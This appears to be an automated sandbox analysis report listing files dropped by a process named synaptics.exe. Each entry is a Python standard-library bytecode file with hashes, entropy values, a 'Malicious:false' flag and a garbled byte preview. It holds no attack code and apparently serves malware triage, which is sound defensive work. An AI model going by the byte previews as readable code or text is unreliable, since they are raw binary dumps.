                                                                                                                                                                                                                Preview:o........{-d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3698
                                                                                                                                                                                                                Entropy (8bit):5.550589438902107
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:i6aByWyhU9ShozDLcLmxESqc0Ic5k4CW36/:i6aByWS2zECW3u4c/
                                                                                                                                                                                                                MD5:5735344BE8490B45DA2158FE04F5DE16
                                                                                                                                                                                                                SHA1:B97ACB771B9170A1158E7474CC9F59CDAAAE94E1
                                                                                                                                                                                                                SHA-256:BF6A21BA8D4498E36E3A9F94FF83C9BCDFDC71A862E6BB38D1D37A00F37B787A
                                                                                                                                                                                                                SHA-512:0612B3AB03F6F91567E378DA4A2D0AD765BF93C7FEDFFC6E178B098C025638658F96D43045028C2B03D030875271EBEC15CCE238327DB9DDA03C5DF00B1A5814
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....#C:\Users\user\Desktop\tmp\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s.i......ascii.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13656
                                                                                                                                                                                                                Entropy (8bit):5.373478262181229
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:kBo+bmHagj6xo0+q6pRkgm0PN5hltuyFBdMTtwKVv6lx2u4X:kVyHagj6xLD6t/cyFBdMTtJilx2u4X
                                                                                                                                                                                                                MD5:F08C25387B8603CE0ECD30D40E8926F7
                                                                                                                                                                                                                SHA1:8BDCE2349EF2282063DE8345B01AFC3FE7F3B050
                                                                                                                                                                                                                SHA-256:742BAA3549D330290C1DF1B523C4BAB8B4199D19098FDAB2564BCE9ABD68EBBB
                                                                                                                                                                                                                SHA-512:8FF4FE29E295F585749A8BF58B9D29365AAC511072B8F354514AC4B4B049AC5CDD2EEA19132CEFF8C740E94F3F68145C79021B234959165C6E936F2CB3C9D4A3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....)C:\Users\user\Desktop\tmp\lib\warnings.pyr........s........r....c....................C...s....t.|.|.|.|.d.|...}.t.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20353
                                                                                                                                                                                                                Entropy (8bit):5.07949148471999
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MjNLGfZTpG14+ORhWBdAP/+6BWCyljPj8j/sBMpNLRVcNh4oC+erfAh:MpcZE15QhWBdg/+6zyhOpNHS/CXLAh
                                                                                                                                                                                                                MD5:9CDB1AF87E5A777DA6F36201C53ABBD2
                                                                                                                                                                                                                SHA1:915A0FFE16555EF73C4D8A821662BA50DB5839B0
                                                                                                                                                                                                                SHA-256:242727B86961DB7D6FE85756D285AF9192C04D195CE3C3D026062A38E9C6D66C
                                                                                                                                                                                                                SHA-512:C92DF134522D289D84DDBC142F857F034DCD75ECB6323640A000A23C57742307AFD73F210D05040D1B123AE044375A3A7A3C1F9A60F5B5C7353C6BF0C72FDF22
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61045
                                                                                                                                                                                                                Entropy (8bit):5.525487888738165
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:6LXnJeiJWt0b6fx7SYJs5pj8bK5cYTMx/0Btq5Z:EXRWt0ufmTMSBc
                                                                                                                                                                                                                MD5:ABCE5126C64F1AB4541829512A604720
                                                                                                                                                                                                                SHA1:6E7D0FB947D2F2221C6373FD2E8F99647E39A35C
                                                                                                                                                                                                                SHA-256:01C03147530E5AB5536BA0A9776A3B2CDBC71A920291E4F786E81B62C0B67137
                                                                                                                                                                                                                SHA-512:2F20D7D77061B3A321D7D58001EFDF2D9826969EB3F80188922B8745DFDA2FA1D45C8CCAF9F2C133222490199108052A8DD7F26D3AD624E4E6CC1FD018F03F04
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48463
                                                                                                                                                                                                                Entropy (8bit):5.114701832748954
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:pbWU3rQFVpyVRbeFRDRBPou+eQyWIrcabGm/9WQxSNGU4QPFHyaqNuTrjfJQRJrG:lWSAVpyWFRDRBPoJIrcabGm/9WQEN6QF
                                                                                                                                                                                                                MD5:26415ADB436879B47ACBECD638B0A925
                                                                                                                                                                                                                SHA1:25847B624664FE838A50C44B91D994B5C5ECB799
                                                                                                                                                                                                                SHA-256:1D8C5AC013F189C37B3D5342ABC973EBBD024D43D05ABAC50791978D8CCF6638
                                                                                                                                                                                                                SHA-512:FD1A0EA023D63118DE942560D0BB36FE8C17E45A0D9D213D7ED1870A9B8F3D9046C68DF6FB6EF05DF2DA48AFA88972597AA2C0406C1BB0713611F15753EDB8C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):248
                                                                                                                                                                                                                Entropy (8bit):4.718941448761525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/0O0teC5VvkFZlaE+MdF/Hj5J+QGuFMntGdgIun:C/8eC7gj+Er+6AGdcn
                                                                                                                                                                                                                MD5:D3D183C7021F109EB22C763F47764450
                                                                                                                                                                                                                SHA1:F8B8BBBB977649EA1A3FF151C83166E86E3894BA
                                                                                                                                                                                                                SHA-256:D1A08B9586F609B734F47A50F9082F4A04A37B3701B16EE69CC5D6663F33AC40
                                                                                                                                                                                                                SHA-512:617EA452AF6FD1844FE917683CE270115202A35F3BFA9CB7059646D1E4DA458D2396466043DD431A1ED8D05BCBE3239FE00BBB5939BB4180FA0A05366EB628DA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....0C:\Users\user\Desktop\tmp\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1570
                                                                                                                                                                                                                Entropy (8bit):4.883141663205626
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:EwQTrff0h6aHqCZ9EwkaLt/bsTkiC5zHXkUzzt/bih5Nz54t/biuyzOQqt/bijsN:EwQTrfch6OD9tLNookmNs4NMqNP
                                                                                                                                                                                                                MD5:AF68C3800792733B4489ECB9FF2D72DC
                                                                                                                                                                                                                SHA1:F98E6B1489507B4FF0639106995887EDF05772DB
                                                                                                                                                                                                                SHA-256:EB38884F083E60CE92BD199753472EB92E959AB618E44B49625B8F2708CC51BC
                                                                                                                                                                                                                SHA-512:8721450F93083E8A8E45A4528B8315E9C2E8A6F467182E085987A53C3D7632766D221ED88BA9B8175BA2ED2C6C09DB01B294F7FE0C33BDF7C3FFE7867D95B5D2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mime..parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r...../C:\Users\user\Desktop\tmp\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Read a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5750
                                                                                                                                                                                                                Entropy (8bit):5.413275297315091
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:0OU9w0n6ShN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:mBN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                                MD5:CD630153B4CD0A1E3966A5D19F7D348B
                                                                                                                                                                                                                SHA1:9457A482F7DCC94CE2A6D1267854914980C80983
                                                                                                                                                                                                                SHA-256:122E5D78E2B54FA6B9239493AC17453F6D268F856FE9F54732899503238C0E56
                                                                                                                                                                                                                SHA-512:E53026FC1FAD619A330C73FBEB4B296464BE54924B93D16C01C1DD618EFA5E68CBAA9FD798DCA9FCA685228CE343CDE49D3652E93F2D4DB0BDCC594EA7A2DD52
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....5C:\Users\user\Desktop\tmp\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps....-
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12522
                                                                                                                                                                                                                Entropy (8bit):5.364530970770821
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:M8lfofBPanIUGehSKaPvqloJzp9UokTFptf58GxRWc:rlgJMGeMPFp9HkT4G3F
                                                                                                                                                                                                                MD5:4FDD7455757A404FB7101B62DB40454C
                                                                                                                                                                                                                SHA1:323EA591DC1BD716C9806CF1E217F2640240189C
                                                                                                                                                                                                                SHA-256:6E22D5B1769A086B268AC7529373C8567E8C161FA9F17357F7F8E04FE8C0BBA1
                                                                                                                                                                                                                SHA-512:3D32CFF5E01D96676CE52E9BE558B63A65BA3936726FA62025B3D125B8B3E3F960F7D02149F0761D38069AAB7E1A4584B8911B4AB915FAF384E886B29BC7AD19
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....1C:\Users\user\Desktop\tmp\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.s.d
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):14792
                                                                                                                                                                                                                Entropy (8bit):5.051314833979986
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:nbtx+iovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:nbtLoM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                                MD5:30B6337DA3F88645EF903007828076FC
                                                                                                                                                                                                                SHA1:AE42AF7C478B6248D559CEFF6F7CAE9493157D5B
                                                                                                                                                                                                                SHA-256:4F2EF17773844EE6F9977B79710F7CEF5C36C1216BA0D69A214A2AA9011EFFAB
                                                                                                                                                                                                                SHA-512:DBAEBCCAED122B1B9195F6A6BC419397A710E9E49ED95FD6FA25862D75ED78A21E23C73147FB8930836F2816064E023C980B18A90D952CCBC7EAF6317DFC9E3E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3250
                                                                                                                                                                                                                Entropy (8bit):5.369971911223405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:XlAnFLYxoMN59tl3kWReNFOsr3n/sMGQHbfuaJg+EtINnig2b4nm+M78ozTho:XOFLsbReNFxr32QSaO+Eiig2gmV78oHu
                                                                                                                                                                                                                MD5:EAACB9DC5172C34FD8DF661557FFE2E5
                                                                                                                                                                                                                SHA1:F481296BCD90B54791576CF7808C819E272B170E
                                                                                                                                                                                                                SHA-256:A9319B5C0E797925C59FBE704DDDD4B180C02CB814D2A944EE65334D26E2750A
                                                                                                                                                                                                                SHA-512:ACA4ACB31E128EF0A7E29393B38A0383CA8DF871643405D697AC735C01D96841617CB53530281344D64E400AC6449C0B2DDA91ED8173E8BFF36C42D47ABD56D0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11585
                                                                                                                                                                                                                Entropy (8bit):5.322334643880502
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:y71q2Qm6z+wYWW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:a1ZRS+ZT2yGRz/p2/5ObDbv+w
                                                                                                                                                                                                                MD5:9076B6E12CA043E5043D4F22914DA4B1
                                                                                                                                                                                                                SHA1:2A1AF0B35BC110E80CA6D43A7DCD06CC1764A453
                                                                                                                                                                                                                SHA-256:69751673DB77EF96B14AC0FEAA8D2FFDEFE19D024F6F3A6FB88D59BFCB30F6BE
                                                                                                                                                                                                                SHA-512:51E94893C6F8F81AC9F890FF3CBF8043305AD8AF08C26DBF4DCD082AF8B2496B31B2B8920A53CE04AD151BE66F708D0FE79E312CE0D5B6B3A64995FE6D047450
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1637
                                                                                                                                                                                                                Entropy (8bit):5.071297880276593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:Zy7gaTT5rqICrNt7xhHfWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:Z/9ht7bWEgQFYSvrEDkvyz3
                                                                                                                                                                                                                MD5:9FFC5C3D97248329949D250B644CFD01
                                                                                                                                                                                                                SHA1:3DCD641778C5A93CCFA58872255A3FF335EDB236
                                                                                                                                                                                                                SHA-256:BDD15448C25582497E9BAEFA7B111D036C823F66CBF24B77BE9FA4C781BFAAF1
                                                                                                                                                                                                                SHA-512:46BC575E35E8D6F3D823022D3B6CD64001B5087A63F2E99E3434CCA7937DA80C56C25B471BBB33B8B3D29679AE6CA2D51814298758D830841AC78C64D00E3F57
                                                                                                                                                                                                                Malicious:false
